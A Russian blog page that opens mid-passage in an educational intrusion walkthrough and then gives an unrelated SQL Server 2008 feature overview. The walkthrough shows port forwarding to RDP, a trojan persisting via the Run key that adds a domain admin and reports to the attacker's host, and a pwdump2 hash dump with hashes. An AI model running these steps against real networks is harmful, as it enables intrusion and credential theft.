использовать все привычные инструменты. Например, я могу легко определить всех локальных администраторов. Как ясно по листингу 7 , учетных записей в этой системе немного. Я вижу лишь учетные записи уже известной службы, локального администратора и администраторов домена. Вероятно, для администрирования системы используется учетная запись администратора домена. Возможно, это позволит получить контроль над доменом при помощи троянского коня. Вообще говоря, хакер предпочел бы прямую атаку, так как она быстрее дает результат. Тем не менее, если все остальные меры не приведут к успеху, я смогу достичь цели путем пассивной атаки. Возможно, вы заметили, что я до сих пор не имел дела ни с какими диалоговыми окнами. Могу ли я использовать для продолжения атаки GUI? Конечно, но с этим связаны некоторые нюансы. Листинг 7. Идентификация локального администратора C:warez>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ---------------------------------------------- Administrator PYN_DMZ_ids PYN-DMZDomain Admins The command completed successfully. Если помните, у межсетевого экрана открыто только два порта: 80 и 443. Никакие программы на Web­сервере не прослушивают порт 443, поэтому я могу связать с ним свой слушатель, не нарушив работы системы и не вызвав подозрений у администраторов. Связывание служб Terminal Services с этим портом было бы очень заметным. Службы Windows Terminal Services (использующие Remote Desktop Protocol) прослушивают порт 3389. Сканирование портов сервера базы данных показывает, что этот порт действительно открыт: C:warez>portscan 172.17.0.3 Port 172.17.0.3:135 open Port 172.17.0.3:139 open Port 172.17.0.3:445 open Port 172.17.0.3:1433 open Port 172.17.0.3:3389 open Я не могу установить прямое соединение с сервером базы данных, потому что он относится к сети с NAT и недоступен из Интернета. Тем не менее, я могу добраться до него, запустив на Web­сервере программу перенаправления трафика на другой порт, которая будет принимать трафик, поступающий Web­серверу через порт 443, и отправлять его SQL­серверу в порт 3389: C:warez>socketpipe 443 88 3389 172.17.0.3 Открыв этот сокет, я просто устанавливаю соединение с Web­сервером с помощью клиента Terminal Services: mstsc /v:192.168.2.30:443 Теперь, когда я могу войти в систему под учетной записью пользователя _ids, я получаю полный доступ к GUI (который, как считают некоторые, уступает командной строке, но это не имеет значения). Как бы то ни было, но контроллер домена еще не пал. Для захвата контроля над ним я воспользуюсь собственным троянским конем. Сначала я зарегистрирую его на Web­сервере (172.17.0.1), используя соединение Terminal Services: c:warez>EvilTrojan -r 172.17.0.1 -a 192.168.2.112 Троянский конь регистрирует себя в разделе реестра HKLMSoftwareMicrosoftWindowsCurrentVersionRun и поэтому будет запускаться при каждом входе пользователя в систему. Если пользователь окажется администратором домена, троянский конь создаст в домене новую учетную запись пользователя и добавит ее в группу администраторов домена. Если ему это удастся, он запустит службу Messenger и отправит мне (в данном случае по адресу 192.168.2.112) административное оповещение. Затем, чтобы скрыть следы, он удалит себя из раздела Run. Все это произойдет в то время, пока администратор будет входить в систему, и тот ничего не заметит. В итоге в системе останется единственный признак того, что случилось что­то неподобающее - файл avcheck.exe в каталоге Windows. Конечно, можно реализовать и другие способы тайной отправки уведомлений. В реальности хакеры часто используют для этого IRC (Internet Relay Chat). Уведомлением может быть даже не вызывающая подозрений HTTP­транзакция. Теперь мне осталось только дождаться, когда в систему войдет администратор домена, и я получу столь нужное мне уведомление: C:>nc -l -p 80 Succeeded in adding a user. User: attacker$ Password: "Uare0wn3d!" Domain: PYN-DMZ DC: PYN-DMZ-DC Получать уведомления можно как угодно. Мой троянский конь просто открывает сокет, связанный с 80­м портом хоста хакера и отправляет уведомление в этот порт. Уведомления можно шифровать, кодировать, отправлять с применением практически любых портов и протоколов и изменять самыми разными способами. Как я уже говорил, для получения уведомлений часто используют каналы чатов IRC. Итак, домен DMZ взломан, и я захватил контроллер домена. Помните, что это хранитель ключей от царской сокровищницы, в которой помимо прочего можно найти базу данных учетных записей пользователей. Пытаясь воспользоваться обретенной мощью, я снова прошу контроллер домена соединиться со мной, чтобы запустить командную оболочку в удаленном режиме. После этого я продолжаю изучать среду, в которой очутился ( листинг 8 ). Листинг 8. Информация о хосте PYNDMZDC, выведенная ipconfig C:warez>ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : PYN-DMZ-DC Primary Dns Suffix . . . . . . . : PYN-DMZ.LOCAL Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : Yes WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL Ethernet adapter CorpNet: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic) #2 Physical Address. . . . . . . . . : 00-03-FF-06-3E-F0 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 10.1.2.16 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : 172.17.0.2 Ethernet adapter DMZNet: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic) Physical Address. . . . . . . . . : 00-03-FF-07-3E-F0 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 172.17.0.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.17.0.1 DNS Servers . . . . . . . . . . . : 172.17.0.2 Как видите, данная система включает два сетевых адаптера, один из которых подключен к корпоративной сети, а второй - к DMZ; по­видимому, это означает, что система выполняет функции маршрутизатора между двумя сетями. Прежде чем я этим воспользуюсь, я могу получить дампы учетных записей всех пользователей, хранящихся на контроллере домена. Помните, я говорил, что контроллер домена хранит около 15 учетных записей пользователей? Терять время нельзя, поэтому я лучше создам дампы хэшей паролей и попробую взломать их. Так как у меня есть привилегии администратора, для получения дампов достаточно запустить очень популярную программу PWDump ( листинг 9 ). Листинг 9. Информация, выведенная pwdump2 C:warez>pwdump2.exe Administrator:500:624aac413795cdc1ff17365faf1ffe89:b9e0c fceaf6d077970306a2fd88a7c0a::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0 d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:28237c666 e4bb3cc96d670cadca1593b::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51 404ee:cd072175763b0d5b3fbb152f57b96e7c::: FAjenstat:1106:daf058ae79085db217306d272a9441bb:c43325 fdf77cafacf02f6e3eaa7f5020::: AAlberts:1107:1df8f06dcf78bb3aaad3b435b51404ee:2408f92a b284046ddcc6952755f449e2::: HAcevedo:1108:dbff4b96d021df2f93e28745b8bf4ba6:bbd9477 810308a0b676f3cda91f10539::: MAlexander:1109:d278e69987353c4c837daf3f2ddd5ca3:2c67b 571425751747e7ae379fefe9fcc::: KAkers:1110:693de7f320aae76293e28745b8bf4ba6:fb853a32 ccd2b92b43639b0e7d29e09d::: TAdams:1111:ea03148efb24d7fc5be30f58d2a941d5:18cce97e e181d42be654133658723813::: KAbercrombie:1112:6c32f38de08f49f026f8092a33daaf05:a88b 78471261477e26d9e4c11571b127::: Sculp:1113:49901659efc5e1d6aad3b435b51404ee:d986300c 7c0c33d3cc5417dbac6f90db::: SAbbas:1114:d6855d70abc371c2b77b4e7109416ab8:363c93e 6be7a5cb001e7ad542c292f26::: ... По умолчанию Windows хранит два представления паролей: "хэш" LM (на самом деле это вовсе не хэш) и хэш Windows NT. Опираясь на полученные данные, я могу сказать, что система, с которой мы имеем дело, хранит хэши LM. Это должно обрадовать хакера, так как хэши LM взломать гораздо легче. Передав дамп программе взлома паролей, я могу взломать большинство хранящихся в этой системе паролей за сутки. На деле, проведя комбинированную атаку, я взломал три пароля менее чем за минуту. Возможно, настоящему взломщику это удалось бы сделать еще быстрее. Есть инструменты, которые взламывают пароли быстрее за счет использования большего объема памяти. Получив пароли, я должен узнать, где они используются. Информация о системах сети 172.17.0/24 у меня имеется, поэтому посмотрим, что есть в сети 10.1.2/24: C:warez>discoverHosts 10.1.2 Reply from 10.1.2.16: bytes=32 time<1ms TTL=128 Reply from 10.1.2.17: bytes=32 time=54ms TTL=128 Система с адресом 10.1.2.16 - это, как мы уже знаем, контроллер домена центра данных, а вот хост с адресом 10.1.2.17 нам неизвестен. Это дело надо исправить: C:warez>GetSystemInfo 10.1.2.17 Server info on 10.1.2.17 Name: PYN-CORPDC Domain: PYN Version: 5.2 Platform ID: 500 Comment: Server Flags: Workstation Server Domain Controller Time source Итак, это контроллер домена, который я изначально искал. Пока могу лишь сказать, что он работает под управлением Windows Server 2003. Возможно, идентификация пользователей этой системы даст мне дополнительную информацию ( листинг 10 ). Листинг 10. Информация о корпоративном контроллере домена, выведенная dumpinfo C:warez>dumpinfo 10.1.2.17 The Administrator is: PYNAdministrator Users on PYN-CORPDC: RID 1000 PYNHelpServicesGroup an Alias RID 1001 PYNSUPPORT_388945a0 a User RID 1002 PYNTelnetClients an Alias RID 1003 PYNPYN-CORPDC$ a User RID 1104 PYNFAjenstat a User RID 1105 PYNAAlberts a User RID 1106 PYNHAcevedo a User RID 1107 PYNMAlexander a User RID 1108 PYNKAkers a User RID 1109 PYNTAdams a User RID 1110 PYNKAbercrombie a User RID 1111 PYNSculp a User RID 1112 PYNSAbbas a User RID 1113 PYNMAllen a User RID 1114 PYNJAdams a User RID 1115 PYNSAlexander a User RID 1116 PYNHAbolrous a User RID 1117 PYNPAckerman a User RID 1118 PYNGAlderson a User ... Share Type Comment IPC$ Unknown Remote IPC NETLOGON Disk Logon server share ADMIN$ Special Remote Admin SYSVOL Disk Logon server share C$ Special Default share Administrators: Unable to enumerate administrators ERROR: Access Denied Список получился довольно большой, причем в нем встречаются и наши старые знакомые, учетные записи которых зарегистрированы и на контроллере домена DMZ. В их число входят пользователи, пароли которых я уже взломал. Теперь я могу или продолжить сбор информации, или просто опробовать в деле взломанные учетные записи. Угадайте с трех раз, что выберет хакер: C:warez>net use \pyn-corpdcc$ /u:pynGAlderson "yosemiTe^" The command completed successfully. Вот и все: сеть полностью взломана, и с ней можно делать что угодно. Реальный хакер мог бы, например, скопировать из нее конфиденциальную информацию, добавить себя в платежную ведомость, использовать эту сеть для атак на другие сети и т. д. Мы получили полный неограниченный доступ ко всей сети contoso.com.


Yuriy O.

Наш блог

SQL-2008

  SQL Server 2008: новый взгляд на платформу доступа к данным Сочетание многих факторов в последнее время привело к самому настоящему информационному взрыву. Рост объема цифровых данных поражает воображение. Отчасти он связан с появлением новых видов информации — от оцифрованных снимков и видеозаписей до результатов считывания радиометок. Усложняются правовые требования, а также требования, связанные с глобализацией, — информация должна быть защищена и одновременно доступна. С другой стороны, для поиска нужных сведений пользователям приходится перелопачивать огромные массивы данных. Причем доступ к этим сведениям они хотят получать при помощи тех же устройств и приложений, что применяют в своей повседневной деятельности, например, Microsoft Office. Производители оборудования продолжают снижать стоимость дисковых накопителей, которая уже достигла 38 центов за гигабайт. А новые устройства, в том числе основанные на «флэш»-технологиях, позволяют хранить информацию с еще меньшими затратами. Однако все это не избавляет организации от проблем, связанных с необходимостью управлять увеличивающимся информационным потоком. Новый взгляд Microsoft на платформу данных отвечает потребностям, возникающим в результате информационного взрыва, и запросам следующего поколения приложений, управляемых данными. Главный принцип заключается в том, что ваши данные должны быть доступны всегда и отовсюду. Организациям необходима платформа, позволяющая управлять информацией любого типа — XML, электронной почтой, календарем, файлами, документами, пространственными данными и пр., — и одновременно предоставляющая широкий набор сервисов для взаимодействия с нею, например поиск, запросы, анализ, формирование отчетов, интеграцию и синхронизацию. Данные с момента их создания и до помещения в архив должны быть доступны с любого устройства — начиная от настольного ПК и заканчивая карманными компьютерами. В целях развития своего представления о платформах данных Microsoft и в будущем будет оказывать финансовую и техническую поддержку ключевых направлений своей деятельности, включающих платформу для критических приложений (Mission Critical Platform), динамическую разработку (Dynamic Development), нереляционные данные (Beyond Relational) и всесторонне обоснованные решения (Pervasive Insight). Из настоящего обзора вы узнаете, какой вклад в это представление вносит SQL Server 2008 и насколько он соответствует потребностям следующего поколения приложений, управляемых данными. Рисунок 1. Платформа данных Microsoft Что нового в SQL Server 2008 Возможности SQL Server 2008 относятся к четырем основным направлениям развития представлений Microsoft о платформе данных. Mission Critical Platform – SQL Server 2008 позволяет организациям выполнять самые сложные приложения, попутно упрощая отделам ИТ работу с инфраструктурой управления данными. Это безопасная, надежная, масштабируемая платформа, защищающая информацию в приложениях и повышающая её доступность. Включенная в неё инновационная инфраструктура управления, основанная на политиках, позволяет определять политики для явного и автоматического администрирования серверных сущностей на одном или нескольких серверах. Кроме того, оптимизированная платформа SQL Server 2008 открывает путь к предсказуемой производительности обработки запросов. Dynamic Development – SQL Server 2008 в сочетании с .NET Framework упрощает разработку новых приложений. Среда ADO.NET Entity Framework повышает эффективность труда разработчиков, поскольку теперь они имеют дело не непосредственно с таблицами и полями, а с логическими информационными сущностями, согласованными с бизнес-требованиями. Более того, они могут создавать приложения, позволяющие пользователям копировать данные на собственные устройства, а позже синхронизовать их с центральными серверами. Beyond Relational Data – SQL Server 2008 позволяет разработчикам управляться с данными любых типов — от традиционных до географических (geospatial). Это открывает дорогу к созданию приложений нового поколения с учетом информации о расположении и возможностью управления документами. Pervasive Business Insight – инфраструктура SQL Server 2008 стала более масштабируемой. Она способна формировать отчеты и выполнять анализ любого объема и сложности, одновременно облегчая пользователям доступ к данным за счет более тесной интеграции с Microsoft Office. В результате ИТ-специалисты могут распространить использование бизнес-аналитики по всей организации. SQL Server 2008 позволяет пользователям консолидировать разнородные данные в корпоративном хранилище, выводя организацию хранилищ данных на новый уровень. Платформа для критических приложений В современном мире, живущем под властью информации, данные и управляющие ими системы должны быть неизменно безопасными и доступными. SQL Server 2008 упрощает инфраструктуру, поддерживаемую ИТ-подразделениями, предоставляя защищённую, масштабируемую и управляемую платформу доступа к корпоративным данным и сокращая время простоя приложений. Безопасная доверяемая платформа для ваших данных SQL Server 2008 опирается на мощные возможности SQL Server 2005, но обеспечивает большую безопасность и доступность благодаря целому ряду усовершенствований. Прозрачное шифрование данных SQL Server 2008 позволяет шифровать базу данных (БД), файлы данных или файлы журналов, не внося в приложения никаких изменений. Благодаря этому становится возможен поиск в зашифрованных данных как по диапазону, так и с нечеткими критериями, а также поиск в защищенных данных, полученных от неавторизованных пользователей. Расширяемое управление ключами SQL Server 2005 представляет собой полное решение для шифрования и управления ключами. Шифрование позволяет организациям соблюсти юридические требования и идти в ногу с общим стремлением к защищенности данных. SQL Server 2008 полностью соответствует этой растущей потребности, поддерживая HSM (Hardware Security Module, аппаратный модуль безопасности) и системы управления ключами сторонних производителей. Аудит SQL Server 2008 позволяет пользователям создавать параметры аудита и управлять ими, используя DDL-операторы (Data Definition Language, язык определения данных). В то же время благодаря более полному аудиту данных становится проще соблюдать законодательные нормы. У организаций появляется возможность получать ответы на наиболее распространенные вопросы, например: «Какие данные извлекались из БД?» Улучшенное зеркалирование БД В SQL Server 2008 улучшены и без того мощные возможности зеркалирования БД, впервые появившиеся в SQL Server 2005. Новая версия пакета освобождает клиента от необходимости указывать партнер по зеркалированию, что позволяет имеющимся приложениям поддерживать зеркалирование без каких-либо изменений. В SQL Server 2008 устранены некоторые сложности зеркалирования. В частности, механизм восстановления после сбоя позволяет временно отключить зеркалирование, чтобы восстановить работоспособность главного сервера. Автоматическое восстановление страниц данных Сбои в оборудовании способны повредить страницы данных БД. С помощью SQL Server 2008 главный и зеркальный компьютеры могут прозрачно для пользователей и приложений восстанавливать работоспособность после ошибок страниц типа 823/824, запрашивая свежую копию подозрительной страницы у партнера по зеркалированию. Сжатие потока журнальных данных Для зеркалирования БД требуется обмен данными между всеми участниками. SQL Server 2008 обеспечивает сжатие исходящего потока данных для журналов, оптимизируя производительность и сокращая нагрузку на сеть, связанную с зеркалированием БД. «Горячая» установка процессоров Возможность «горячей» установки процессоров позволяет пользователям при необходимости динамически масштабировать базы данных, расширяя процессорные ресурсы SQL Server 2008 на поддерживаемых аппаратных платформах без какого бы то ни было простоя приложений. Помните, что в SQL Server уже поддерживается возможность «горячей» установки памяти. Эффективное управление при помощи политик В рамках общих устремлений Microsoft к сокращению совокупной стоимости владения в SQL Server 2008 включена новая, основанная на политиках платформа управления ядром БД SQL Server — среда декларативного управления Declarative Management Framework (DMF). Ее использование приносит следующие преимущества: · гарантия соответствия конфигурации системы требованиям политик; · мониторинг изменений в системе и их предотвращение путём разработки соответствующих политик; · сокращение совокупной стоимости владения за счет упростившегося администрирования; · выявление проблем совместимости в SQL Server Management Studio. Среда декларативного управления Среда DMF представляет собой систему управления одним или несколькими экземплярами SQL Server 2008, основанную на политиках. Чтобы воспользоваться ею, администраторы SQL Server при помощи SQL Server Management Studio создают политики для управления сущностями на сервере, например экземпляром SQL Server, базами данных или другими объектами SQL. У DMF три компонента: управление политиками, администраторы политик (то есть те, кто создаёт их) и явное администрирование. Администраторы выбирают один или несколько объектов управления и явно проверяют, согласуются ли эти объекты с конкретной политикой, так же явно вынуждая их к такому согласованию. Автоматическое администрирование Администраторы политик задействуют их автоматические выполнение, используя один из перечисленных режимов: · Enforce – чтобы предотвратить нарушения политики, используются DDL-триггеры; · Check on Changes – для проверки политики при внесении соответствующего изменения используется уведомление о событии; · Check on Schedule – для периодической проверки политики используется задание SQL Server Agent. Рисунок 2. Declarative Management Framework Упростившаяся установка Благодаря переработанной архитектуре установки, настройки и конфигурирования в SQL Server 2008 значительно улучшено обслуживание всего жизненного цикла пакета. Эти улучшения позволили отделить процесс физического копирования программы на оборудование от настройки программного обеспечения SQL Server, так что организациям и партнерам проще стало реализовывать рекомендуемые конфигурации. Оптимальная и предсказуемая производительность системы По мере увеличения объемов данных и количества пользователей организациям становится все сложнее получить предсказуемый отклик. SQL Server 2008 содержит обширный набор компонентов, обеспечивающих масштабируемую и предсказуемую производительность для любой рабочей нагрузки. Сбор данных о производительности Настройка производительности и диагностика связанных с ней проблем — задача, требующая от администратора немалых усилий. Чтобы ему проще было принимать решения, в SQL Server 2008 включены расширенный набор показателей производительности, новое централизованное хранилище данных о работоспособности и новые инструменты для составления отчетов и мониторинга. Сжатие данных Сжатие данных позволяет более эффективно хранить их и уменьшить затраты на накопительные устройства. При этом существенно снижаются рабочие нагрузки, повышается производительность, а объем ввода-вывода, например в хранилищах данных, увеличивается. Resource Governor Благодаря введению в SQL Server 2008 компонента Resource Governor организации смогут гарантировать конечным пользователям согласованный и предсказуемый отклик. Resource Governor позволяет устанавливать ограничения на использование ресурсов и задавать приоритеты для различных задач. В результате производительность параллельной обработки в большей степени соответствует ожиданиям конечных пользователей. Предсказуемая производительность запросов SQL Server 2008 обеспечивает более высокую устойчивость и предсказуемость запросов, позволяя фиксировать их планы. Благодаря этому организации могут переносить устойчивые планы запросов при замене серверного оборудования, его обновлении или развертывании в рабочей среде. Динамическая разработка SQL Server 2008 поддерживает создание приложений, опирающихся на целый ряд управляемых и обычных технологий подключения, в том числе ODBC, ADO/OLEDB, ADO.NET. В частности, в сочетании с .NET Framework он позволяет разработчикам создавать мощные приложения БД следующего поколения. В среде ADO.NET Entity Framework разработчики имеют дело не непосредственно с таблицами и полями, а с логическими информационными сущностями, которые согласованы с бизнес-требованиями. Тем самым повышается эффективность их труда. Кроме того, они могут создавать приложения, позволяющие пользователям копировать данные на собственные устройства, а позже синхронизовать их с центральными серверами. Ускорение разработки посредством сущностей Сейчас среди разработчиков БД наблюдается общая тенденция — определять бизнес-объекты высокого уровня, или сущности, сопоставляя их с таблицам и полям базы данных. При этом программиста интересуют не на таблицы и поля, а на более общие сущности, представляющие реальные данные, например, «Клиент» или «Заказ». Среда ADO.NET Entity Framework позволяет писать программы для работы с реляционными данными, оперируя такими сущностями. Программирование на более высоком уровне абстрагирования весьма продуктивно и позволяет разработчику в полной мере воспользоваться преимуществами модели «сущность-связь» (Entity-Relationship, E-R). Ниже перечислены некоторые новшества SQL Server 2008 в области разработки приложений. Language Integrated Query Встроенные запросы LINQ (Language Integrated Query) позволяют разработчикам вместо использования SQL-запросов обращаться к данным из программ на управляемых языках, например C# или VB.NET. Благодаря LINQ стали возможны встроенные сильно типизированные запросы с ориентацией на наборы данных, написанные на .NET-языках и обращенные к ADO.Net (LINQ to SQL), ADO.Net DataSet (LINQ to DataSets), ADO.NET Entity Framework (LINQ to Entities), а также к провайдеру Entity Data Service Mapping. В SQL Server 2008 имеется новый провайдер LINQ to SQL, позволяющий разработчикам использовать LINQ, обращаясь непосредственно к таблицам и полям SQL Server 2008. Рисунок 3. Запрос типа LINQ to Entities ADO . NET - сервисы Object Уровень ADO.NET-сервисов Object позволяет материализовать данные как объекты CLR, отслеживать их изменения и хранить их. Теперь разработчики, использующие инфраструктуру ADO.NET, могут писать программы для БД, используя объекты CLR, управляемые ADO.NET. Их поддержка в SQL Server 2008 более эффективна и оптимизирована, что повышает производительность и упрощает разработку. Нерегулярно подключающиеся системы Распространение портативных устройств и повышение мобильности сотрудников сделали нерегулярное подключение практически стилем жизни. В SQL Server 2008 к вашим услугам унифицированная платформа, позволяющая проводить согласованную синхронизацию приложений, хранилищ и типов данных. В сочетании с Visual Studio® платформа SQL Server 2008 позволяет оперативно создавать нерегулярно подключаемые приложения, используя новые сервисы синхронизации, входящие в ADO.NET, и дизайнеры Visual Studio, обеспечивающие реализацию офлайнового режима. А благодаря поддержке отслеживания изменений клиенты могут разрабатывать приложения, основанные на кэше, синхронизации и уведомлениях, и пользоваться продуманной реализацией SQL Server 2008. При этом производительность снижается незначительно. Нереляционные данные В приложения включаются все более разнообразные типы данных, выходящие за рамки традиционных типов, поддерживаемых базами данных. SQL Server 2008 опирается на богатый опыт поддержки нереляционных данных и содержит новые их типы, позволяющие разработчикам и администраторам эффективно хранить неструктурированную информацию, например документы и изображения, а также управлять ею. Кроме того, добавлена поддержка географических данных. Помимо новых типов данных как таковых в SQL Server 2008 содержится обширный набор сервисов для работы с ними, обеспечивающих надежность, безопасность и управляемость платформы. Далее перечислены некоторые усовершенствования в области хранения нереляционных данных. Хранение данных любых типов В SQL Server 2008 обеспечивается бесшовное взаимодействие между реляционными и нереляционными данными, что позволяет пользователям обращаться к документам как к данным, кодировать сложные иерархии в XML и выполнять запросы как к реляционным, так и к текстовым данным. Дата и время В SQL Server 2008 включены новые типы данных для обозначения даты и времени: · DATE – только дата; · TIME – только время; · DATETIMEOFFSET –дата и время с учетом часового пояса; · DATETIME2 – тип для даты и времени с поддержкой большего диапазона долей секунд и лет, чем в существующем типе DATETIME. Эти типы позволяют различать дату и время в приложениях, а также обеспечивают использование больших диапазонов или большей точности для временных показателей. Иерархии Приложения для БД SQL Server 2008 способны моделировать древовидные структуры более эффективно, чем это возможно сейчас. Новый системный тип HierarchyId предназначен для хранения значений, представляющих узлы иерархии. Он будет реализован как пользовательский тип CLR, снабженный несколькими эффективными и удобными встроенными методами для создания узлов иерархии и гибкого манипулирования ими. FILESTREAM Включенный в SQL Server 2008 тип данных FILESTREAM обеспечивает хранение больших объемов двоичных данных непосредственно в файловой системе NTFS, причем так, что они остаются частью БД с поддержкой транзакционной целостности. Это позволяет размещать двоичные данные, традиционно управляемые БД, за ее пределами на менее затратных накопителях и в то же время обеспечивать корректный доступ к ним. Встроенный полнотекстовый поиск Встроенный полнотекстовый поиск стирает границы между текстовыми и реляционными данными, позволяя пользователям посредством текстовых индексов эффективно выполнять поиск в больших текстовых полях. Разреженные поля Благодаря этому компоненту значения NULL («пустые» значения) больше не занимают физическое пространство, что делает управление пустыми данными в высшей степени эффективным. В частности, разреженные поля позволяют создавать в БД SQL Server 2008 объектные модели с большим количеством значений NULL, не занимающие много места на диске. Большие пользовательские типы В SQL Server 2008 устранен 8-килобайтное органичение для пользовательских типов (User Defined Type, UDT), что значительно расширяет возможности пользователей. Использование данных о расположении Многие коммерческие приложения все в большей степени зависят от географической информации. В SQL Server 2008 включены новые её типы, что позволяет разработчикам создавать приложения с учетом расположения. Пространственные данные В SQL Server 2008 включено новое векторное решение для пространственных данных, согласующееся с промышленными стандартами. С его помощью разработчики будут создавать приложения, получающие данные о географическом расположении, и без труда интегрировать эту информацию в приложения. Данные о местонахождении SQL Server 2008 позволяет пользователям получать данные о местонахождении и интегрировать логику работы с такими данными в существующие приложения. Всесторонне обоснованные решения Всесторонний анализ бизнес-данных позволяет принимать более обоснованные решения благодаря тому, что пользователи могут собирать, очищать, хранить и готовить данные для этой цели. Ориентируясь на тенденции рынка бизнес-аналитики, создатели SQL Server 2008 включили в него масштабируемую инфраструктуру, позволяющую ИТ-специалистам распространять возможности интеллектуального анализа данных в масштабе всей организации; этому способствуют управление отчетами и анализом любого объема, а также глубокая интеграция с Microsoft Office System. Платформа SQL Server 2008 позволяет организациям вовлекать в бизнес-анализ всех сотрудников, благодаря чему решения принимаются быстрее и оказываются качественнее и компетентнее. Организация хранилищ данных Чтобы извлечь из информации коммерческую выгоду, компании неустанно вкладывают средства в решения для бизнес-анализа и организации хранения данных. SQL Server 2008 — обширная масштабируемая платформа для организации хранилищ данных, которая позволяет быстрее и эффективнее интегрировать информацию в хранилища, а также управлять растущими её объемами, предоставляя всем пользователям сведения, необходимые для лучшего понимания этой информации. Ниже перечислены некоторые усовершенствования в хранении данных. Сжатие данных В мире постоянно появляются мириады новых компьютеров, в силу чего объемы данных в хранилищах продолжают расти. За счет сжатия данных SQL Server 2008 позволяет предприятиям более эффективно хранить информацию, а также повысить производительность благодаря сокращению объемов ввода-вывода. Сжатие резервных копий Обеспечение доступа к резервным копиям, хранящимся на дисках, — дорогая и ресурсоемкая задача. Благодаря сжатию резервных копий в SQL Server 2008 требуется меньше пространства для их хранения, да и работа с ними идет быстрее, поскольку сокращается объем дискового ввода-вывода. Параллельный доступ к секционированным таблицам Секционирование облегчает работу с большими таблицами, поскольку они прозрачным для пользователей образом разделяются на более управляемые блоки данных. В SQL Server 2008 еще более расширены возможности секционирования, доступные в SQL Server 2005. Оптимизация запросов Star Join В SQL Server 2008 повышена производительность запросов в наиболее типовых сценариях работы с хранилищами данных. Благодаря распознаванию закономерностей в хранилище оптимизация Star Join сокращает время отклика на запросы. Resource Governor Благодаря введению в SQL Server 2008 компонента Resource Governor организации смогут гарантировать конечным пользователям согласованный и предсказуемый отклик. Resource Governor позволяет устанавливать ограничения на использование ресурсов и задавать приоритеты для различных задач. В результате производительность параллельной обработки лучше согласуется с потребностями пользователей. Grouping Sets Grouping Sets — расширенная версия раздела GROUP BY, позволяющая пользователям определить несколько группирований в одном и том же запросе. Таким образом, получается единый результирующий набор, эквивалентный объединению (UNION ALL) запросов с различными группированиями, что облегчает и ускоряет выполнение запросов и отчетов с агрегированием. Контроль за изменением данных Благодаря этой функции изменения в данных отслеживаются и записываются в таблицы изменений. Причём в таблицах и схемах они захватываются полностью, с сохранением согласования между ними. Поддерживаются даже изменения схемы. Это позволяет организациям интегрировать в хранилище данных самую свежую информацию. SQL -оператор MERGE Благодаря введению SQL-оператора MERGE разработчики получают возможность более эффективно обрабатывать типичные ситуации взаимодействия с хранилищами данных, например, проверять наличие записи перед выполнением операций вставки или обновления. Масштабируемое средство Integration Services В Integration Services внесено два основных усовершенствования, направленных на повышение масштабируемости. Улучшения в конвейере SQL Server Integration Services (SSIS) Пакеты интеграции данных теперь масштабируются более эффективно, используя доступные ресурсы и справляясь с самыми большими нагрузками в масштабе предприятия. При этом использование нескольких процессоров позволило улучшить масштабируемость исполняющей среды. Просмотры SSIS с сохранением Выполнение просмотров — одна из наиболее типичных ETL-операций. Особенно часто она встречается в хранилищах данных, где необходимы просмотры фактических записей для преобразования бизнес-ключей в соответствующие суррогаты. В SSIS повышена производительность просмотров при работе с большими таблицами. Масштабируемая аналитическая платформа Предоставить конечным пользователям мгновенный доступ к точной информации и в мгновение ока дать им ответы даже на самые сложные вопросы — в этом состоит предназначение OLAP (Online Analytical Processing). Опираясь на богатый опыт SQL Server 2005, версия SQL Server 2008 обеспечивает более быстрое выполнение запросов и актуализацию данных, что позволяет организациям проводить очень сложный анализ с большим количеством измерений и агрегирований. Чтобы облегчить этот процесс, в SQL Server Analysis Services внесены перечисленные ниже усовершенствования. Масштаб и производительность анализа SQL Server 2008 располагает более широкими возможностями анализа благодаря улучшенным аналитическим функциям и поддержке более сложных вычислений и агрегирований. Новые инструменты конструирования кубов помогут пользователям упростить разработку аналитической инфраструктуры, позволив им разрабатывать решения оптимальной производительности. Блочные вычисления Благодаря блочным вычислениям достигается значительное повышение производительности обработки, позволяющее пользователям увеличить глубину иерархий и сложность вычислений. Обратная запись Новые возможности обратной записи MOLAP в SQL Server 2008 Analysis Services устраняют необходимость в запросах к разделам ROLAP. В результате пользователи могут работать с более сложными сценариями обратной записи из аналитических приложений, не принося в жертву традиционную производительность OLAP. Масштабируемое составление отчетов Для многих компаний становится серьезной проблемой предоставление нужной информации нужным сотрудникам в нужное время. В SQL Server 2008 включен высокопроизводительный механизм составления, обработки и форматирования отчетов, оснащенный полным набором инструментов для их создания и просмотра, а также для управления ими. Расширяемая архитектура и открытые интерфейсы облегчают интеграцию решения по подготовке отчетов в разнообразные ИТ-среды. Механизм для отчетов предприятия Благодаря упрощенному развертыванию и настройке легко организовать доставку отчетов как внутри организации, так и вне ее. Это позволит пользователям без проблем создавать и распространять отчеты любого размера и любой степени сложности. Развертывание отчетов в Интернете Можно без каких-либо усилий предоставить отчеты поставщикам и заказчикам, опубликовав их в Интернете. Управление инфраструктурой отчетов Благодаря наличию централизованного хранилища и API для всех конфигурационных параметров стало удобнее осуществлять поддержку отчетов. Благодаря управлению памятью, консолидации инфраструктур и упростившемуся конфигурированию, появились новые возможности по управлению поведением сервера. Улучшенное масштабирование конфигурации наружу Чтобы улучшить масштабирование конфигурации наружу, в SQL Server 2008 включены инструменты, поддерживающие управление несколькими серверами отчетов. Обширные возможности по работе с информацией SQL Server 2008 дает пользователям возможность принимать обоснованные бизнес-решения за счет следующих улучшений в системе подготовки отчетов, позволяющей получать доступ к информации при помощи повседневных рабочих инструментов: Усовершенствования в построителе отчетов Вы можете без труда конструировать нерегламентированные и авторские отчеты любой структуры при 